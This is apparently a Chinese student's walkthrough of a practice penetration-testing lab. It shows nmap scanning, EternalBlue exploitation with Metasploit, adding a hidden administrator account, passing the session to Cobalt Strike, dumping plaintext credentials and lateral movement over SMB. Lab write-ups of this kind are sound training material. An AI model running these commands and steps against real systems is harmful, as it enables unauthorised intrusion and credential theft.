# 前言

第二次实训靶场,用的红日靶场 2,熟悉了很多,这个靶场也是很简单。不知道为什么做完后我去看老师给的教程,我没有那么多步骤,但是也都上线了就没再管了

# 外围打点

# 信息收集

nmap 192.168.246.1/24

image-20240312080735992

这里可以看到发现外围主机开放了很多端口,然后对这个 ip 进一步做信息收集

nmap 192.168.246.164 -p80,135,445,1433,3389,7001,49152,60966 -sV --script=vuln

image-20240312081926273

发现这里似乎存在永恒之蓝,打开 msf 尝试利用一下

image-20240312082223784

这里选择永恒之蓝后尝试攻击

image-20240312093348979

可以看到这里就直接拿到了一个 meterpreter 的 shell

# 远程桌面

这里可以创建一个用户来远程登录

net user clown test_passwd123 /add
net localgroup administrators clown /add

image-20240312094154976

然后尝试远程登录桌面

rdesktop 192.168.246.164

image-20240312094326216

# 内网渗透

# 上线 cs

use exploit/windows/local/payload_inject

这里选择模块,同时将 CS 打开,然后设置监听器

image-20240312135124763

然后设置 msf

image-20240312135235129

set disablepayloadhandler true

然后关闭 msf 自身的监听

image-20240312135315184

然后直接运行即可

image-20240312135406972

# 内网横向

这里使用权限提升来尝试提高自身权限

image-20240312102219067

image-20240312102257834

操作成功后,会有一台新的主机上线

image-20240312160228644

然后对其抓取明文密码

image-20240312160329942

然后点击密码凭证查看

image-20240312160354395

这里可以看到拿到很多组用户名密码,使用端口扫描对内网 ip 进行扫描

image-20240312161004871

发现都开启了 445 端口,建立一个 smb 监听

image-20240312161643520

然后选择使用刚刚的 smb 监听

image-20240312161701526

直接上线即可

image-20240312161724158

结束